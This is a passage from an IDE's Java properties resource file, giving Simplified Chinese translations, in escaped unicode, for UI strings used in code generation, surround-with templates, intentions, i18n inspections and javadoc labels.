c\\u5165\ndialog.paste.on.import.text=\\u60a8\\u7c98\\u8d34\\u7684\\u4ee3\\u7801\\u7247\\u6bb5\\u4f7f\\u7528\\u7684\\u662f\\u5728\\u65b0\\u4e0a\\u4e0b\\u6587\\u4e2d\\u5bfc\\u5165\\u65f6\\u4e0d\\u53ef\\u8bbf\\u95ee\\u7684\\u7c7b\\u3002
\\u9009\\u62e9\\u60a8\\u8981\\u5bfc\\u5165\\u5230\\u65b0\\u6587\\u4ef6\\u7684\\u7c7b\\u3002\ndialog.paste.on.import.text2=\\u60a8\\u7c98\\u8d34\\u7684\\u4ee3\\u7801\\u7247\\u6bb5\\u4f7f\\u7528\\u7684\\u662f\\u5728\\u65b0\\u4e0a\\u4e0b\\u6587\\u4e2d\\u5bfc\\u5165\\u65f6\\u4e0d\\u53ef\\u8bbf\\u95ee\\u7684\\u5143\\u7d20\\u3002
\\u9009\\u62e9\\u60a8\\u8981\\u5bfc\\u5165\\u5230\\u65b0\\u6587\\u4ef6\\u7684\\u5143\\u7d20\\u3002\ndialog.paste.on.import.text3=\\u7c98\\u8d34\\u7684\\u4ee3\\u7801\\u7247\\u6bb5\\u5728\\u5f53\\u524d\\u4e0a\\u4e0b\\u6587\\u4e2d\\u5f15\\u5165\\u4e86\\u65b0\\u7684\\u5bfc\\u5165\\u3002
\\u9009\\u62e9\\u8981\\u5220\\u9664\\u7684\\u5bfc\\u5165\\u3002\ncopy.paste.reference.notification={0} \\u5bfc\\u5165\\u88ab\\u6dfb\\u52a0

\\u67e5\\u770b\\u6dfb\\u52a0\\u7684\\u5bfc\\u5165...\npaste.data.flavor.folding=\\u6298\\u53e0\\u6570\\u636e\npaste.dataflavor.referencedata=\\u53c2\\u8003\\u6570\\u636e\ngenerate.constructor.fields.chooser.title=\\u9009\\u62e9\\u7531\\u6784\\u9020\\u65b9\\u6cd5\\u521d\\u59cb\\u5316\\u7684\\u5b57\\u6bb5\nerror.attempt.to.generate.constructor.for.anonymous.class=\\u65e0\\u6cd5\\u5411\\u533f\\u540d\\u7c7b\\u6dfb\\u52a0\\u6784\\u9020\\u51fd\\u6570\ngenerate.constructor.super.constructor.chooser.title=\\u9009\\u62e9\\u8d85\\u7c7b\\u6784\\u9020\\u51fd\\u6570\ngenerate.delegate.method.chooser.title=\\u9009\\u62e9\\u751f\\u6210\\u4ee3\\u7406\\u7684\\u65b9\\u6cd5\ngenerate.delegate.target.chooser.title=\\u9009\\u62e9\\u8981\\u751f\\u6210\\u4ee3\\u7406\\u7684\\u76ee\\u6807\ngenerate.equals.and.hashcode.already.defined.warning=\\u65b9\\u6cd5 ''boolean equals(Object)'' \\u548c ''int hashCode()'' \\u5df2\\u7ecf\\u5728\\u7c7b {0} \\u4e2d\\u5b9a\\u4e49\\u4e86\\u3002\\u8981\\u5220\\u9664\\u5b83\\u4eec\\u5e76\\u7ee7\\u7eed\\u5417\\uff1f\ngenerate.equals.and.hashcode.already.defined.warning.anonymous=\\u65b9\\u6cd5 'boolean equals(Object)' \\u548c 'int hashCode()' \\u5df2\\u7ecf\\u5728\\u8be5\\u533f\\u540d\\u7c7b\\u4e2d\\u5b9a\\u4e49\\u4e86\\u3002\\u8981\\u5220\\u9664\\u5b83\\u4eec\\u5e76\\u7ee7\\u7eed\\u5417\\uff1f\ngenerate.equals.and.hashcode.already.defined.title=\\u751f\\u6210 equals() \\u548c hashCode()\ngenerate.equals.and.hashcode.error.no.object.class.message=\\u4e0d\\u80fd\\u751f\\u6210 equals() \\u548c hashCode()\\u3002\\n\\u627e\\u4e0d\\u5230 java.lang.Object \\u7c7b\\u3002\ngenerate.equals.and.hashcode.error.no.object.class.title=\\u6ca1\\u6709 java.lang.Object\ngenerate.equals.compare.nested.arrays.comment= // \\u5728\\u8fd9\\u91cc\\u6bd4\\u8f83\\u5d4c\\u5957\\u6570\\u7ec4 - {0} \\u7684\\u503c\ngenerate.equals.compare.arrays.comment= // \\u53ef\\u80fd\\u4e0d\\u6b63\\u786e - \\u6bd4\\u8f83 Object[] \\u6570\\u7ec4\\u4f7f\\u7528 Arrays.equals\ngenerate.getter.setter.title=\\u9009\\u62e9\\u5b57\\u6bb5\\u4ee5\\u751f\\u6210 Getter \\u548c Setter\ngenerate.getter.fields.chooser.title=\\u9009\\u62e9\\u5b57\\u6bb5\\u4ee5\\u751f\\u6210 Getter\ngenerate.setter.fields.chooser.title=\\u9009\\u62e9\\u5b57\\u6bb5\\u4ee5\\u751f\\u6210 Setter\ngenerate.setter.template=Setter \\u6a21\\u677f:(&S)\ngenerate.getter.template=Getter \\u6a21\\u677f:(&G)\noverride.implement.broken.file.template.message=\\u8bf7\\u66f4\\u6b63 \"Overridden/Implemented Method Body\" \\u6a21\\u677f\noverride.implement.broken.file.template.title=\\u6587\\u4ef6\\u6a21\\u677f\\u9519\\u8bef\nmethods.to.implement.chooser.title=\\u9009\\u62e9\\u8981\\u5b9e\\u73b0\\u7684\\u65b9\\u6cd5\nmethods.to.override.chooser.title=\\u9009\\u62e9\\u8981\\u91cd\\u5199\\u7684\\u65b9\\u6cd5\nmethods.to.override.implement.chooser.title=\\u9009\\u62e9\\u8986\\u76d6/\\u5b9e\\u73b0\\u7684\\u65b9\\u6cd5\ngenerate.list.popup.title=\\u751f\\u6210\nsurround.with.cast.template=((Type)expr)\nsurround.with.dowhile.template=do / while\nsurround.with.for.template=for\nsurround.with.ifelse.expression.template=if (expr) {...} else {...}\nsurround.with.ifelse.template=if / else\nsurround.with.if.expression.template=if (expr) {...}\nsurround.with.if.template=if\nsurround.with.not.instanceof.template=!(expr instanceof Type)\nsurround.with.not.template=!(expr)\nsurround.with.parenthesis.template=!(expr)\nsurround.with.runnable.template=Runnable\nsurround.with.synchronized.template=synchronized\nsurround.with.try.catch.finally.template=try / catch / finally\nsurround.with.try.catch.template=try / catch\nsurround.with.try.catch.incorrect.template.message=Catch Body \\u65e0\\u6548\\u7684\\u6587\\u4ef6\\u6a21\\u677f\nsurround.with.try.catch.incorrect.template.title=\\u7528 Try / Catch \\u5305\\u56f4\nsurround.with.try.finally.template=try / finally\nsurround.with.while.template=while\nsurround.with.runtime.type.template=((RuntimeType)expr)\nsurround.with.chooser.title=\\u5305\\u56f4\nunwrap.popup.title=\\u9009\\u62e9\\u8bed\\u53e5\\u89e3\\u9664\\u5305\\u56f4/\\u5220\\u9664\nunwrap.if=\\u89e3\\u5f00 'if...'\nunwrap.else=\\u89e3\\u5f00 'else...'\nremove.else=\\u79fb\\u9664 'else...'\nunwrap.while=\\u89e3\\u5f00 'while...'\nunwrap.for=\\u89e3\\u5f00 'for...'\nunwrap.braces=\\u89e3\\u5f00\\u62ec\\u53f7\nunwrap.try=\\u89e3\\u5f00 'try...'\nunwrap.conditional=\\u89e3\\u5f00 'f ?a : b'\nremove.catch=\\u79fb\\u9664 'catch...'\nunwrap.array.initializer=\\u89e3\\u5f00\\u6570\\u7ec4\\u521d\\u59cb\\u5316\nunwrap.synchronized=\\u89e3\\u5f00 'synchronized...'\nunwrap.with.placeholder=\\u89e3\\u5f00 ''{0}''\nunwrap.anonymous=\\u89e3\\u5f00 'anonymous...'\nunwrap.lambda=\\u89e3\\u5f00 'lambda...'\ngenerate.equals.hashcode.wizard.title=\\u751f\\u6210 equals() \\u548c hashCode()\ngenerate.equals.hashcode.equals.fields.chooser.title=\\u9009\\u62e9\\u8981\\u5305\\u542b\\u5728 equals() \\u4e2d\\u7684\\u5b57\\u6bb5(&F)\ngenerate.equals.hashcode.hashcode.fields.chooser.title=\\u9009\\u62e9\\u8981\\u5305\\u542b\\u5728 hashCode() \\u4e2d\\u7684\\u5b57\\u6bb5(&F)\ngenerate.equals.hashcode.non.null.fields.chooser.title=\\u9009\\u62e9\\u6240\\u6709\\u975e\\u7a7a\\u5b57\\u6bb5(&F)\ngenerate.equals.hashcode.use.getters=\\u5728\\u4ee3\\u7801\\u751f\\u6210\\u671f\\u95f4\\u4f7f\\u7528 getter(&G)\ngenerate.equals.hashcode.template=\\u6a21\\u677f:(&T)\ngenerate.equals.hashcode.accept.sublcasses=\\u63a5\\u53d7\\u5b50\\u7c7b\\u4f5c\\u4e3a equals() \\u65b9\\u6cd5\\u7684\\u53c2\\u6570(&S)\ngenerate.equals.hashcode.accept.sublcasses.explanation=\\u867d\\u7136\\u5728 Object.equals() \\u7684\\u89c4\\u8303\\u901a\\u5e38\\u4e0d\\u63a5\\u53d7\\u5b50\\u7c7b\\uff0c
\\u4f46\\u4e3a\\u4e86\\u5728\\u6846\\u67b6\\u80fd\\u6b63\\u5e38\\u5de5\\u4f5c\\uff0c\\u63a5\\u53d7\\u5b50\\u7c7b\\u53ef\\u80fd\\u662f\\u5fc5\\u987b\\u7684\\u3002
\\u5c31\\u50cf Hibernate \\u751f\\u6210\\u4ee3\\u7406\\u5b50\\u7c7b\\u4e00\\u6837\\u3002\ngenerate.equals.hashcode.internal.error=\\u5185\\u90e8\\u9519\\u8bef\ngenerate.equals.warning.equals.for.nested.arrays.not.supported=equals() \\u4e0d\\u652f\\u6301\\u5d4c\\u5957\\u7684\\u6570\\u7ec4\ngenerate.equals.warning.generated.equals.could.be.incorrect=\\u4e3a Object []\\u751f\\u6210\\u7684 equals() \\u53ef\\u80fd\\u4e0d\\u6b63\\u786e\ngenerate.equals.hashcode.warning.hashcode.for.arrays.is.not.supported=hashCode() \\u4e0d\\u652f\\u6301\\u6570\\u7ec4\nhighlight.thrown.exceptions.chooser.all.entry=\\u6240\\u6709\\u5217\\u51fa\\u7684\nhighlight.exceptions.thrown.chooser.title=\\u9009\\u62e9\\u5f02\\u5e38\\u7c7b\\u4ee5\\u9ad8\\u4eae\\u663e\\u793a\nhighlight.exceptions.thrown.notfound=\\u627e\\u4e0d\\u5230\\u65b9\\u6cd5\\u4e2d\\u629b\\u51fa\\u5f02\\u5e38\nstatus.bar.exit.points.highlighted.message={0} \\u4e2a\\u9000\\u51fa\\u70b9\\u9ad8\\u4eae (\\u518d\\u6309 {1} \\u79fb\\u9664\\u9ad8\\u4eae\\uff0c\\u6309 Esc \\u79fb\\u9664\\u6240\\u6709\\u9ad8\\u4eae)\nstatus.bar.highlighted.usages.message=\\u627e\\u5230 {1} \\u7684 {0} \\u4e2a\\u4f7f\\u7528 (\\u518d\\u6309 {2} \\u79fb\\u9664\\u9ad8\\u4eae\\uff0c\\u6309 Esc \\u79fb\\u9664\\u6240\\u6709\\u9ad8\\u4eae)\nstatus.bar.highlighted.usages.no.target.message=\\u627e\\u5230 {0} \\u4e2a\\u4f7f\\u7528 (\\u518d\\u6309 {2} \\u79fb\\u9664\\u9ad8\\u4eae\\uff0c\\u6309 Esc \\u79fb\\u9664\\u6240\\u6709\\u9ad8\\u4eae)\nstatus.bar.overridden.methods.highlighted.message=\\u627e\\u5230 {0} \\u4e2a\\u91cd\\u5199\\u65b9\\u6cd5 (\\u518d\\u6309 {1} \\u79fb\\u9664\\u9ad8\\u4eae\\uff0c\\u6309 Esc \\u79fb\\u9664\\u6240\\u6709\\u9ad8\\u4eae)\nstatus.bar.highlighted.usages.not.found.message=\\u6ca1\\u6709\\u627e\\u5230 {0} \\u7684\\u7528\\u6cd5\nstatus.bar.highlighted.usages.not.found.no.target.message=\\u6ca1\\u6709\\u627e\\u5230\\u7528\\u6cd5\nparameter.info.no.parameters=<\\u65e0\\u53c2\\u6570>\nxml.tag.info.no.attributes=<\\u65e0\\u5c5e\\u6027>\nn.of.m={0} / {1}\nquick.definition.back=\\u540e\\u9000\nquick.definition.forward=\\u5411\\u524d\nquick.definition.edit.source=\\u7f16\\u8f91\\u6e90\\u7801\nquick.definition.show.source=\\u663e\\u793a\\u6e90\\u7801\ni18n.quickfix.property.panel.title=\\u5c5e\\u6027\\u4fe1\\u606f\ni18n.quickfix.property.panel.update.all.files.in.bundle.checkbox=\\u66f4\\u65b0\\u8d44\\u6e90\\u5305\\u4e2d\\u7684\\u6240\\u6709\\u5c5e\\u6027\\u6587\\u4ef6(&R)\ni18n.quickfix.property.panel.properties.file.label=\\u5c5e\\u6027\\u6587\\u4ef6:(&P)\ni18n.quickfix.property.panel.property.value.label=\\u5c5e\\u6027\\u503c:(&V)\ni18n.quickfix.property.panel.property.key.label=\\u5c5e\\u6027\\u952e:(&K)\ni18n.quickfix.code.panel.title=Java \\u4ee3\\u7801\\u4fe1\\u606f\ni18n.quickfix.code.panel.resource.bundle.expression.label=\\u8d44\\u6e90\\u5305\\u8868\\u8fbe\\u5f0f\\uff1a(&E)\ni18n.quickfix.preview.panel.title=Preview\nquickfix.i18n.concatentation=\\u56fd\\u9645\\u5316\\u5b57\\u7b26\\u4e32\\u5305\\u542b\\u786c\\u7f16\\u7801\\u5b57\\u7b26\\u4e32\\u7684\\u8fde\\u63a5\nquickfix.i18n.concatentation.error=\\u5b57\\u7b26\\u4e32\\u8fde\\u63a5\\u6ca1\\u6709\\u627e\\u5230\nquickfix.i18n.command.name=\\u56fd\\u9645\\u5316\ninspection.i18n.display.name=\\u786c\\u7f16\\u7801\\u5b57\\u7b26\\u4e32\ninspection.i18n.option.ignore.assert=\\u5ffd\\u7565 assert \\u8bed\\u53e5\\u53c2\\u6570\ninspection.i18n.option.ignore.for.exception.constructor.arguments=\\u5ffd\\u7565 exception \\u6784\\u9020\\u51fd\\u6570\\u53c2\\u6570:\ninspection.i18n.option.ignore.for.specified.exception.constructor.arguments=\\u5ffd\\u7565\\u6307\\u5b9a\\u7684\\u5f02\\u5e38\\u6784\\u9020\\u51fd\\u6570\\u7684\\u53c2\\u6570\ninspection.i18n.option.ignore.for.junit.assert.arguments=\\u5ffd\\u7565 JUnit \\u65ad\\u8a00\\u53c2\\u6570\ninspection.i18n.option.ignore.qualified.class.names=\\u5ffd\\u7565\\u503c\\u4e0e\\u73b0\\u6709\\u5b8c\\u5168\\u9650\\u5b9a\\u7c7b\\u540d\\u76f8\\u7b49\\u7684\\u6587\\u5b57\ninspection.i18n.option.ignore.property.keys=\\u5ffd\\u7565\\u503c\\u4e0e\\u73b0\\u6709\\u5c5e\\u6027\\u952e\\u540d\\u76f8\\u7b49\\u7684\\u6587\\u5b57\ninspection.i18n.option.ignore.nonalphanumerics=\\u5ffd\\u7565\\u4e0d\\u5305\\u542b\\u5b57\\u6bcd\\u5b57\\u7b26\\u7684\\u6587\\u5b57\ninspection.i18n.quickfix=\\u56fd\\u9645\\u5316\\u786c\\u7f16\\u7801\\u5b57\\u7b26\\u4e32\ninspection.i18n.message.general.with.value=\\u786c\\u7f16\\u7801\\u5b57\\u7b26\\u4e32:{0}\ninspection.unresolved.property.key.reference.name=\\u65e0\\u6548\\u5c5e\\u6027\\u5065\ninspection.unresolved.property.key.reference.message=\\u5b57\\u7b26\\u4e32\\u6587\\u5b57 ''{0}'' \\u4e0d\\u662f\\u6709\\u6548\\u7684\\u5c5e\\u6027\\u952e\ninspection.invalid.resource.bundle.reference=\\u65e0\\u6548\\u7684\\u8d44\\u6e90\\u5305\\u5f15\\u7528 ''{0}''\ni18nize.dialog.title=\\u56fd\\u9645\\u5316\\u786c\\u7f16\\u7801\\u5b57\\u7b26\ni18nize.dialog.error.jdk.message=\\u627e\\u4e0d\\u5230\\u7c7b 'java.util.ResourceBundle' \\u3002\\n\\u8bf7\\u8bbe\\u7f6e\\u6b63\\u786e\\u7684 JDK\\u3002\ni18nize.dialog.error.jdk.title=\\u7c7b\\u672a\\u627e\\u5230\ni18nize.dialog.property.file.chooser.title=\\u9009\\u62e9\\u5c5e\\u6027\\u6587\\u4ef6\ni18nize.dialog.template.link.label=\\u7f16\\u8f91\\u56fd\\u9645\\u5316\\u6a21\\u677f\ni18nize.dialog.error.property.already.defined.message=\\u6587\\u4ef6 ''{1}'' \\u4e2d\\u5df2\\u5b58\\u5728\\u5c5e\\u6027 ''{0}''\\u3002\\u8986\\u76d6\\u5b83\\u7684\\u503c\\uff1f\ni18nize.dialog.error.property.already.defined.title=\\u5c5e\\u6027\\u5df2\\u7ecf\\u5b58\\u5728\nintention.split.declaration.family=\\u62c6\\u5206\\u58f0\\u660e\nintention.split.declaration.assignment.text=\\u62c6\\u5206\\u4e3a\\u58f0\\u660e\\u548c\\u8d4b\\u503c\nintention.split.if.family=\\u62c6\\u5206 'if'\nintention.split.if.text=\\u62c6\\u5206\\u4e3a2\\u4e2a If\nintention.split.filter.text=\\u62c6\\u5206\\u4e3a\\u8fc7\\u6ee4\\u5668\\u94fe\nintention.split.filter.family=\\u62c6\\u5206\\u8fc7\\u6ee4\\u5668\nintention.merge.filter.text=\\u5408\\u5e76\\u8fc7\\u6ee4\\u5668\\u94fe\nintention.merge.filter.family=\\u5408\\u5e76\\u8fc7\\u6ee4\\u5668\nintention.inline.map.inline.text=\\u5185\\u8054 ''{0}'' \\u4e3b\\u4f53\\u8fdb\\u5165\\u4e0b\\u4e00\\u4e2a ''{1}'' \\u8c03\\u7528\nintention.inline.map.merge.text=\\u5408\\u5e76 ''{0}'' \\u8c03\\u7528\\u548c ''{1}'' \\u8c03\\u7528\nintention.inline.map.family=\\u5185\\u8054\\u6d41\\u6620\\u5c04\\u65b9\\u6cd5\nintention.extract.map.step.family=\\u63d0\\u53d6\\u5230\\u5355\\u72ec\\u7684\\u6620\\u5c04\\u65b9\\u6cd5\nintention.extract.map.step.text=\\u63d0\\u53d6\\u53d8\\u91cf ''{0}'' \\u5230 ''{1}'' \\u64cd\\u4f5c\nintention.compose.function.text=\\u7528 andThen \\u8c03\\u7528\\u66ff\\u6362\\u5d4c\\u5957\\u51fd\\u6570\\u8c03\\u7528\nintention.compose.function.family=\\u7528\\u7ec4\\u5408\\u66ff\\u6362\\u5d4c\\u5957\\u51fd\\u6570\\u8c03\\u7528\nintention.introduce.variable.text=\\u5f15\\u5165\\u5c40\\u90e8\\u53d8\\u91cf\nintention.extract.method.text=\\u63d0\\u53d6\\u65b9\\u6cd5\nintention.encapsulate.field.text=\\u5c01\\u88c5\\u5b57\\u6bb5\nintention.implement.abstract.method.family=\\u5b9e\\u73b0\\u62bd\\u8c61\\u65b9\\u6cd5\nintention.implement.abstract.method.text=\\u5b9e\\u73b0\\u65b9\\u6cd5 ''{0}''\nintention.override.method.text=\\u91cd\\u5199\\u65b9\\u6cd5 ''{0}''\nintention.add.annotation.family=\\u6dfb\\u52a0\\u6ce8\\u89e3\nintention.add.on.demand.static.import.family=\\u6dfb\\u52a0\\u6309\\u9700\\u9759\\u6001\\u5bfc\\u5165\nintention.add.on.demand.static.import.text=\\u4e3a\\u201c{0}\\u201d\\u6dfb\\u52a0\\u6309\\u9700\\u9759\\u6001\\u5bfc\\u5165\nintention.add.single.member.static.import.family=\\u6dfb\\u52a0\\u5355\\u4e2a\\u6210\\u5458\\u9759\\u6001\\u5bfc\\u5165\nintention.add.single.member.static.import.text=\\u4e3a ''{0}'' \\u6dfb\\u52a0\\u9759\\u6001\\u5bfc\\u5165\nintention.use.single.member.static.import.text=\\u4e3a ''{0}'' \\u4f7f\\u7528\\u9759\\u6001\\u5bfc\\u5165\nintention.add.single.member.import.text=\\u4e3a ''{0}'' \\u6dfb\\u52a0\\u5bfc\\u5165\nintention.add.explicit.type.arguments.family=\\u6dfb\\u52a0\\u663e\\u5f0f\\u7684\\u7c7b\\u578b\\u53c2\\u6570\nintention.replace.concatenation.with.formatted.output.family=\\u7528\\u683c\\u5f0f\\u5316\\u8f93\\u51fa\\u66ff\\u6362\\u8fde\\u63a5\nintention.replace.concatenation.with.formatted.output.text=\\u7528 'java.text.MessageFormat.format()' \\u66ff\\u6362 '+'\nintention.color.chooser.dialog=\\u9009\\u62e9\\u989c\\u8272\nintention.convert.to.basic.latin=\\u8f6c\\u6362\\u4e3a\\u57fa\\u672c\\u7684\\u62c9\\u4e01\nintention.surround.resource.with.ARM.block=\\u7528 try-with-resources \\u5305\\u56f4\nintention.surround.with.ARM.block.template='try-with-resources'\ndialog.create.field.from.parameter.title=\\u521b\\u5efa\\u5b57\\u6bb5\ndialog.create.field.from.parameter.already.exists.text=\\u4f7f\\u7528\\u73b0\\u6709\\u5b57\\u6bb5 ''{0}''\\uff1f\ndialog.create.field.from.parameter.already.exists.title=\\u5b57\\u6bb5\\u5df2\\u7ecf\\u5b58\\u5728\ndialog.create.field.from.parameter.field.type.label=\\u5b57\\u6bb5\\u7684\\u7c7b\\u578b:\ndialog.create.field.from.parameter.field.name.label=Name:\ndialog.create.field.from.parameter.declare.final.checkbox=\\u58f0\\u660e final(&F)\ndialog.create.class.destination.package.label=\\u76ee\\u6807\\u5305\\uff1a\ndialog.create.class.package.chooser.title=\\u9009\\u62e9\\u76ee\\u6807\\u5305\ncreate.directory.command=\\u521b\\u5efa\\u76ee\\u5f55\ndialog.create.class.label=\\u521b\\u5efa {0}:\ndialog.create.class.name=\\u521b\\u5efa {0} {1}\nintention.implement.abstract.class.family=\\u5b9e\\u73b0\\u62bd\\u8c61\\u7c7b\\u6216\\u63a5\\u53e3\nintention.implement.abstract.class.default.text=\\u5b9e\\u73b0\\u62bd\\u8c61\\u7c7b\nintention.implement.abstract.class.interface.text=\\u5b9e\\u73b0\\u63a5\\u53e3\nintention.implement.abstract.class.subclass.text=\\u521b\\u5efa\\u5b50\\u7c7b\nintention.error.cannot.create.class.message=\\u65e0\\u6cd5\\u521b\\u5efa\\u7c7b ''{0}''\nintention.error.cannot.create.class.title=\\u521b\\u5efa\\u7c7b\\u5931\\u8d25\nintention.assign.field.from.parameter.text=\\u5c06\\u53c2\\u6570\\u5206\\u914d\\u7ed9\\u5b57\\u6bb5\\u201c{0}\\u201d\nintention.assign.field.from.parameter.family=\\u5c06\\u53c2\\u6570\\u5206\\u914d\\u7ed9\\u5b57\\u6bb5\nintention.create.field.from.parameter.text=\\u521b\\u5efa\\u53c2\\u6570 ''{0}'' \\u7684\\u5b57\\u6bb5\nintention.create.field.from.parameter.family=\\u521b\\u5efa\\u5b57\\u6bb5\\u53c2\\u6570\nintention.bind.fields.from.parameters.text=\\u5c06 {0} \\u53c2\\u6570\\u7ed1\\u5b9a\\u5230\\u5b57\\u6bb5\nintention.bind.fields.from.parameters.family=\\u5c06\\u53c2\\u6570\\u7ed1\\u5b9a\\u5230\\u5b57\\u6bb5\nintention.implement.abstract.method.searching.for.descendants.progress=\\u5bfb\\u627e\\u7684\\u540e\\u4ee3...\nintention.implement.abstract.method.error.no.classes.message=\\u6ca1\\u6709\\u627e\\u5230\\u53ef\\u4ee5\\u5b9e\\u73b0\\u6b64\\u65b9\\u6cd5\\u7684\\u7c7b\nintention.implement.abstract.method.error.no.classes.title=\\u6ca1\\u6709\\u627e\\u5230\\u7684\\u7c7b\nintention.implement.abstract.method.class.chooser.title=\\u9009\\u62e9\\u5b9e\\u73b0\\u7c7b\nintention.implement.abstract.method.command.name=\\u5b9e\\u73b0\\u65b9\\u6cd5\nintention.invert.if.condition=\\u53cd\\u8f6c 'if' \\u6761\\u4ef6\nintention.extract.if.condition.text=\\u63d0\\u53d6 if ({0})\nintention.extract.if.condition.family=\\u63d0\\u53d6 if \\u6761\\u4ef6\nintention.underscores.in.literals.family=\\u6570\\u5b57\\u6587\\u5b57\\u4e2d\\u7684\\u4e0b\\u5212\\u7ebf\nintention.remove.literal.underscores=\\u4ece\\u6587\\u5b57\\u4e2d\\u79fb\\u9664\\u4e0b\\u5212\\u7ebf\nintention.insert.literal.underscores=\\u5c06\\u4e0b\\u5212\\u7ebf\\u63d2\\u5165\\u6587\\u5b57\nintention.replace.cast.with.var.text=\\u7528 ''{1}'' \\u66ff\\u6362 ''{0}''\nintention.replace.cast.with.var.family=\\u7528\\u53d8\\u91cf\\u66ff\\u6362 cast\nintention.convert.color.representation.text=\\u8f6c\\u6362\\u4e3a ''new Color{0}''\nintention.convert.color.representation.family=\\u8f6c\\u6362\\u989c\\u8272\\u8868\\u793a\nintention.break.string.on.line.breaks.text=\\u5728 '\\\\n' \\u4e0a\\u65ad\\u5f00\\u5b57\\u7b26\\u4e32\nintention.unwrap.else.branch=\\u89e3\\u5f00 'else' \\u5206\\u652f\nintention.unwrap.else.branch.changes.semantics=\\u89e3\\u5f00 'else' \\u5206\\u652f(\\u6539\\u53d8\\u8bed\\u4e49)\nintention.split.switch.branch.with.several.case.values.family=\\u5c06\\u5177\\u6709\\u591a\\u4e2a case \\u503c\\u7684 switch \\u5206\\u652f\\u62c6\\u5206\\u4e3a\\u5355\\u4e2a\\u7684 switch \\u5206\\u652f\nintention.split.switch.branch.with.several.case.values.copy.text=\\u590d\\u5236 'switch' \\u5206\\u652f\nintention.split.switch.branch.with.several.case.values.split.text=\\u62c6\\u5206 'switch' \\u5206\\u652f\\u7684\\u503c\n\nintention.create.test=\\u521b\\u5efa\\u6d4b\\u8bd5\nintention.create.test.dialog.testing.library=\\u6d4b\\u8bd5\\u5e93:(&L)\nintention.create.test.dialog.language=\\u8bed\\u8a00:\nintention.create.test.dialog.class.name=\\u7c7b\\u540d:\nintention.create.test.dialog.super.class=\\u8d85\\u7c7b:\nintention.create.test.dialog.choose.super.class=\\u9009\\u62e9\\u8d85\\u7c7b\nintention.create.test.dialog.generate=\\u751f\\u6210:\nintention.create.test.dialog.show.inherited=\\u663e\\u793a\\u7ee7\\u627f\\u7684\\u65b9\\u6cd5(&I)\nintention.create.test.dialog.setUp=setUp/@Before(&U)\nintention.create.test.dialog.tearDown=tearDown/@After(&D)\nintention.create.test.dialog.select.methods=\\u751f\\u6210\\u6d4b\\u8bd5\\u65b9\\u6cd5\\u4e3a:(&M)\nintention.create.test.dialog.library.not.found={0} \\u5e93\\u5728\\u8be5\\u6a21\\u5757\\u4e2d\\u672a\\u627e\\u5230\nintention.create.test.dialog.fix.library=\\u4fee\\u590d\nintention.create.test.dialog.java=Java\n\nintention.wrap.with.unmodifiable=\\u7528\\u4e0d\\u53ef\\u4fee\\u6539\\u7684\\u96c6\\u5408\\u6216 map \\u5305\\u88c5\nintention.wrap.with.unmodifiable.list=\\u7528\\u4e0d\\u53ef\\u4fee\\u6539\\u7684 list \\u5305\\u88c5\nintention.wrap.with.unmodifiable.set=\\u7528\\u4e0d\\u53ef\\u4fee\\u6539\\u7684 set \\u5305\\u88c5\nintention.wrap.with.unmodifiable.map=\\u7528\\u4e0d\\u53ef\\u4fee\\u6539\\u7684 map \\u5305\\u88c5\n\nlightbulb.tooltip=\\u70b9\\u51fb\\u6216\\u6309 {0}\ndialog.intention.settings.intention.list.title=\\u610f\\u5411\\u5217\\u8868\ndialog.intention.settings.description.panel.title=\\u63cf\\u8ff0:\ndialog.intention.settings.description.usage.example.title=\\u4f7f\\u7528\\u793a\\u4f8b\nintention.settings=\\u610f\\u5411\nintention.settings.category.text=\\u60a8\\u9009\\u62e9\\u4e86\\u610f\\u5411\\u7c7b\\u522b {0}.
\\u901a\\u8fc7\\u70b9\\u51fb\\u590d\\u9009\\u6846\\uff0c\\u60a8\\u53ef\\u4ee5\\u542f\\u7528/\\u7981\\u7528\\u6b64\\u7c7b\\u522b\\u7684\\u6240\\u6709\\u610f\\u5411\\u3002\\u8981\\u542f\\u7528/\\u7981\\u7528\\u4e00\\u4e2a\\u7279\\u5b9a\\u610f\\u5411\\uff0c\\u5728\\u8be5\\u7c7b\\u522b\\u91cc\\u9762\\u9009\\u62e9\\u3002\ntemplates.postfix.settings.category.text=\\u4f60\\u9009\\u62e9\\u4e86\\u540e\\u7f00\\u8865\\u5168\\u8bed\\u8a00\\u3002
\\u901a\\u8fc7\\u70b9\\u51fb\\u590d\\u9009\\u6846\\uff0c\\u60a8\\u53ef\\u4ee5\\u542f\\u7528/\\u7981\\u7528\\u8be5\\u7c7b\\u522b\\u7684\\u6240\\u6709\\u540e\\u7f00\\u8865\\u5168\\u6a21\\u677f\\u3002
\\u8981\\u542f\\u7528/\\u7981\\u7528\\u4e00\\u4e2a\\u540e\\u7f00\\u6a21\\u677f\\uff0c\\u5728\\u8be5\\u7ec4\\u91cc\\u9009\\u62e9\\u3002\ntemplates.postfix.settings.category.before=\\u6b64\\u5904\\u5c06\\u663e\\u793a\\u5177\\u6709\\u6240\\u9009\\u6a21\\u677f\\u7684\\u793a\\u4f8b\\u4ee3\\u7801\\u3002\\n \\u95ea\\u70c1\\u7684\\u77e9\\u5f62 \\u663e\\u793a\\u610f\\u5411\\u9002\\u7528\\u7684\\u5730\\u65b9\\u3002\ntemplates.postfix.settings.category.after=\\u540e\\u7f00\\u8865\\u5168\\u6267\\u884c\\u7684\\u7ed3\\u679c\\u5c06\\u663e\\u793a\\u5728\\u8fd9\\u91cc\\u3002\ntemplates.postfix.editable.description=\\u7528\\u6237\\u5b9a\\u4e49\\u7684\\u540e\\u7f00\\u6a21\\u677f\njavadoc.description.copied.from.interface=\\u4ece\\u63a5\\u53e3\\u590d\\u5236\\u7684\\u63cf\\u8ff0\\uff1a\njavadoc.description.copied.from.class=\\u4ece\\u7c7b\\u590d\\u5236\\u7684\\u63cf\\u8ff0\\uff1a\njavadoc.description.copied.from.field=\\u4ece\\u5b57\\u6bb5\\u590d\\u5236\\u7684\\u63cf\\u8ff0\\uff1a\njavadoc.deprecated=\\u8fc7\\u65f6\\u7684\njavadoc.since=\\u81ea:\njavadoc.see.also=\\u8bf7\\u53c2\\u9605:\njavadoc.parameters=\\u53c2\\u6570:\njavadoc.returns=\\u8fd4\\u56de:\njavadoc.throws=\\u629b\\u51fa:\njavadoc.method.in.interface={0} \\u5728\\u63a5\\u53e3 {1}\njavadoc.method.in.class={0} \\u5728\\u7c7b 